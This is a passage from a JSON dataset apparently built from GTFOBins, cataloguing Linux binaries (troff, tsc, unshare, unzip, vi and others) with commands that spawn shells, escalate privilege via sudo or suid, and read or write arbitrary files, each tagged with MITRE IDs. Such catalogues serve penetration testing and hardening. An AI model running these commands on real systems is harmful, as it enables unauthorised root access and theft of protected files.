/bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/torsocks/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:troff:file-read:0:sudo","toolId":"gtfo:troff","toolName":"troff","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"troff /path/to/input-file","description":"The file is typeset but text is still readable in the output, alternatively the output can be read with `man -l`.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/troff/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:troff:file-read:0:suid","toolId":"gtfo:troff","toolName":"troff","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"troff /path/to/input-file","description":"The file is typeset but text is still readable in the output, alternatively the output can be read with `man -l`.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/troff/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:troff:file-read:0:unprivileged","toolId":"gtfo:troff","toolName":"troff","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"troff /path/to/input-file","description":"The file is typeset but text is still readable in the output, alternatively the output can be read with `man -l`.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/troff/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:tsc:file-read:0:sudo","toolId":"gtfo:tsc","toolName":"tsc","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"tsc /path/to/input-file.ts","description":"Content is leaked as error messages. The file extension must be one of the supported ones, e.g., `.ts`, `.tsx`, etc.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/tsc/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:tsc:file-read:0:unprivileged","toolId":"gtfo:tsc","toolName":"tsc","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"tsc /path/to/input-file.ts","description":"Content is leaked as error messages. The file extension must be one of the supported ones, e.g., `.ts`, `.tsx`, etc.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/tsc/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:tsc:file-write:0:sudo","toolId":"gtfo:tsc","toolName":"tsc","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"tsc /path/to/input-file.ts --outFile /path/to/output-file","description":"Content is leaked as error messages and written to file. The file extension must be one of the supported ones, e.g., `.ts`, `.tsx`, etc.","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/tsc/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:tsc:file-write:0:unprivileged","toolId":"gtfo:tsc","toolName":"tsc","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"tsc /path/to/input-file.ts --outFile /path/to/output-file","description":"Content is leaked as error messages and written to file. The file extension must be one of the supported ones, e.g., `.ts`, `.tsx`, etc.","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/tsc/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:tshark:inherit:0:sudo","toolId":"gtfo:tshark","toolName":"tshark","name":"inherit ← lua","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell","File Download","File Read","File Write","Execution","File Upload","Privilege Escalation"],"nativeCategory":["inherit","from:lua"],"command":"echo '...' >/path/to/temp-file\ntshark -Xlua_script:/path/to/temp-file","description":"This allows to run Lua code (`...`).","mitre":["T1059","T1071","T1105","T1005","T1565","T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/tshark/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:tshark:inherit:0:unprivileged","toolId":"gtfo:tshark","toolName":"tshark","name":"inherit ← lua","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell","File Download","File Read","File Write","Execution","File Upload"],"nativeCategory":["inherit","from:lua"],"command":"echo '...' >/path/to/temp-file\ntshark -Xlua_script:/path/to/temp-file","description":"This allows to run Lua code (`...`).","mitre":["T1059","T1071","T1105","T1005","T1565","T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/tshark/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:ul:file-read:0:sudo","toolId":"gtfo:ul","toolName":"ul","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"ul /path/to/input-file","description":"The read file content is corrupted by replacing occurrences of `$'\\b_'` to terminal sequences and by converting tabs to spaces.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/ul/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:ul:file-read:0:suid","toolId":"gtfo:ul","toolName":"ul","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"ul /path/to/input-file","description":"The read file content is corrupted by replacing occurrences of `$'\\b_'` to terminal sequences and by converting tabs to spaces.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/ul/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:ul:file-read:0:unprivileged","toolId":"gtfo:ul","toolName":"ul","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"ul /path/to/input-file","description":"The read file content is corrupted by replacing occurrences of `$'\\b_'` to terminal sequences and by converting tabs to spaces.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/ul/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:unexpand:file-read:0:sudo","toolId":"gtfo:unexpand","toolName":"unexpand","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"unexpand -t999 /path/to/input-file","description":"Convert sequences of (e.g., `999`) spaces to tab.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/unexpand/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:unexpand:file-read:0:suid","toolId":"gtfo:unexpand","toolName":"unexpand","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"unexpand -t999 /path/to/input-file","description":"Convert sequences of (e.g., `999`) spaces to tab.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/unexpand/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:unexpand:file-read:0:unprivileged","toolId":"gtfo:unexpand","toolName":"unexpand","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"unexpand -t999 /path/to/input-file","description":"Convert sequences of (e.g., `999`) spaces to tab.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/unexpand/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:uniq:file-read:0:sudo","toolId":"gtfo:uniq","toolName":"uniq","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"uniq /path/to/input-file","description":"The read file content is corrupted by squashing multiple adjacent lines.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/uniq/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:uniq:file-read:0:suid","toolId":"gtfo:uniq","toolName":"uniq","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"uniq /path/to/input-file","description":"The read file content is corrupted by squashing multiple adjacent lines.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/uniq/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:uniq:file-read:0:unprivileged","toolId":"gtfo:uniq","toolName":"uniq","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"uniq /path/to/input-file","description":"The read file content is corrupted by squashing multiple adjacent lines.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/uniq/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:unshare:shell:0:sudo","toolId":"gtfo:unshare","toolName":"unshare","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"unshare /bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/unshare/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:unshare:shell:0:suid","toolId":"gtfo:unshare","toolName":"unshare","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"unshare -r /bin/sh","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/unshare/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:unshare:shell:0:unprivileged","toolId":"gtfo:unshare","toolName":"unshare","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"unshare /bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/unshare/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:unsquashfs:privilege-escalation:0:sudo","toolId":"gtfo:unsquashfs","toolName":"unsquashfs","name":"privilege-escalation","source":"GTFOBins","platform":["Linux"],"capability":["Privilege Escalation"],"nativeCategory":["privilege-escalation"],"command":"unsquashfs shell\n./squashfs-root/sh -p","mitre":["T1548"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/unsquashfs/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:unsquashfs:privilege-escalation:0:suid","toolId":"gtfo:unsquashfs","toolName":"unsquashfs","name":"privilege-escalation","source":"GTFOBins","platform":["Linux"],"capability":["Privilege Escalation"],"nativeCategory":["privilege-escalation"],"command":"unsquashfs shell\n./squashfs-root/sh -p","mitre":["T1548"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/unsquashfs/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:unzip:privilege-escalation:0:sudo","toolId":"gtfo:unzip","toolName":"unzip","name":"privilege-escalation","source":"GTFOBins","platform":["Linux"],"capability":["Privilege Escalation"],"nativeCategory":["privilege-escalation"],"command":"unzip -K shell.zip\n./sh -p","mitre":["T1548"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/unzip/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:unzip:privilege-escalation:0:suid","toolId":"gtfo:unzip","toolName":"unzip","name":"privilege-escalation","source":"GTFOBins","platform":["Linux"],"capability":["Privilege Escalation"],"nativeCategory":["privilege-escalation"],"command":"unzip -K shell.zip\n./sh -p","mitre":["T1548"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/unzip/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:update-alternatives:file-write:0:sudo","toolId":"gtfo:update-alternatives","toolName":"update-alternatives","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"echo DATA >/path/to/temp-file\nupdate-alternatives --force --install /path/to/output-file x /path/to/temp-file 0","description":"Write in `/path/to/output-file` a symlink to `/path/to/temp-file`.","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/update-alternatives/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:update-alternatives:file-write:0:suid","toolId":"gtfo:update-alternatives","toolName":"update-alternatives","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"echo DATA >/path/to/temp-file\nupdate-alternatives --force --install /path/to/output-file x /path/to/temp-file 0","description":"Write in `/path/to/output-file` a symlink to `/path/to/temp-file`.","mitre":["T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/update-alternatives/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:urlget:file-read:0:sudo","toolId":"gtfo:urlget","toolName":"urlget","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"urlget - /path/to/input-file","description":"This is part of `gettext` and usually not in `PATH`, e.g., on Arch it can be found at `/usr/lib/gettext/urlget`.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/urlget/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:urlget:file-read:0:suid","toolId":"gtfo:urlget","toolName":"urlget","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"urlget - /path/to/input-file","description":"This is part of `gettext` and usually not in `PATH`, e.g., on Arch it can be found at `/usr/lib/gettext/urlget`.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/urlget/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:urlget:file-read:0:unprivileged","toolId":"gtfo:urlget","toolName":"urlget","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"urlget - /path/to/input-file","description":"This is part of `gettext` and usually not in `PATH`, e.g., on Arch it can be found at `/usr/lib/gettext/urlget`.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/urlget/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:uuencode:file-read:0:sudo","toolId":"gtfo:uuencode","toolName":"uuencode","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"uuencode /path/to/input-file /dev/stdout | uudecode","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/uuencode/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:uuencode:file-read:0:suid","toolId":"gtfo:uuencode","toolName":"uuencode","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"uuencode /path/to/input-file /dev/stdout | uudecode","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/uuencode/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:uuencode:file-read:0:unprivileged","toolId":"gtfo:uuencode","toolName":"uuencode","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"uuencode /path/to/input-file /dev/stdout | uudecode","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/uuencode/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:uv:shell:0:sudo","toolId":"gtfo:uv","toolName":"uv","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"uv run /bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/uv/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:uv:shell:0:unprivileged","toolId":"gtfo:uv","toolName":"uv","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"uv run /bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/uv/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:vagrant:inherit:0:sudo","toolId":"gtfo:vagrant","toolName":"vagrant","name":"inherit ← ruby","source":"GTFOBins","platform":["Linux"],"capability":["File Download","File Read","File Write","Library Load","Reverse/Bind Shell","Execution","File Upload","Privilege Escalation"],"nativeCategory":["inherit","from:ruby"],"command":"echo '...' >Vagrantfile\nvagrant up","description":"This allows to run Ruby code (`...`).","mitre":["T1105","T1005","T1565","T1574","T1059","T1071","T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/vagrant/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:vagrant:inherit:0:unprivileged","toolId":"gtfo:vagrant","toolName":"vagrant","name":"inherit ← ruby","source":"GTFOBins","platform":["Linux"],"capability":["File Download","File Read","File Write","Library Load","Reverse/Bind Shell","Execution","File Upload"],"nativeCategory":["inherit","from:ruby"],"command":"echo '...' >Vagrantfile\nvagrant up","description":"This allows to run Ruby code (`...`).","mitre":["T1105","T1005","T1565","T1574","T1059","T1071","T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/vagrant/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:valgrind:shell:0:sudo","toolId":"gtfo:valgrind","toolName":"valgrind","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"valgrind /bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/valgrind/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:valgrind:shell:0:unprivileged","toolId":"gtfo:valgrind","toolName":"valgrind","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"valgrind /bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/valgrind/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:varnishncsa:file-write:0:sudo","toolId":"gtfo:varnishncsa","toolName":"varnishncsa","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"varnishncsa -g request -q 'ReqURL ~ \"/xxxxxxxxxx\"' -F '%{yyy}i' -w /path/to/output-file","description":"The command hangs, so the trigger command must be performed asynchronously or in another terminal:\n\n```\ncurl -H 'xxx: DATA' http://localhost:6081/xxxxxxxxxx\n```","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/varnishncsa/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:varnishncsa:file-write:0:suid","toolId":"gtfo:varnishncsa","toolName":"varnishncsa","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"varnishncsa -g request -q 'ReqURL ~ \"/xxxxxxxxxx\"' -F '%{yyy}i' -w /path/to/output-file","description":"The command hangs, so the trigger command must be performed asynchronously or in another terminal:\n\n```\ncurl -H 'xxx: DATA' http://localhost:6081/xxxxxxxxxx\n```","mitre":["T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/varnishncsa/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:vi:file-read:0:sudo","toolId":"gtfo:vi","toolName":"vi","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"vi /path/to/input-file","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/vi/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:vi:file-read:0:suid","toolId":"gtfo:vi","toolName":"vi","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"vi /path/to/input-file","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/vi/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:vi:file-read:0:unprivileged","toolId":"gtfo:vi","toolName":"vi","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"vi /path/to/input-file","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/vi/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:vi:file-write:0:sudo","toolId":"gtfo:vi","toolName":"vi","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"vi /path/to/output-file\niDATA\n^[\nw","description":"Where `^[` is the escape key.","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/vi/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:vi:file-write:0:suid","toolId":"gtfo:vi","toolName":"vi","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"vi /path/to/output-file\niDATA\n^[\nw","description":"Where `^[` is the escape key.","mitre":["T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/vi/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:vi:file-write:0:unprivileged","toolId":"gtfo:vi","toolName":"vi","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"vi /path/to/output-file\niDATA\n^[\nw","description":"Where `^[` is the escape key.","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/vi/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:vi:shell:0:sudo","toolId":"gtfo:vi","toolName":"vi","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"vi -c ':!/bin/sh' /dev/null","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/vi/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:vi:shell:0:suid","toolId":"gtfo:vi","toolName":"vi","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"vi -c ':!/bin/sh' /dev/null","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/vi/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:vi:shell:0:unprivileged","toolId":"gtfo:vi","toolName":"vi","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"vi -c ':!/bin/sh' /dev/null","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/vi/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:vi:shell:1:sudo","toolId":"gtfo:vi","toolName":"vi","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"vi -c ':shell'","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/vi/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution 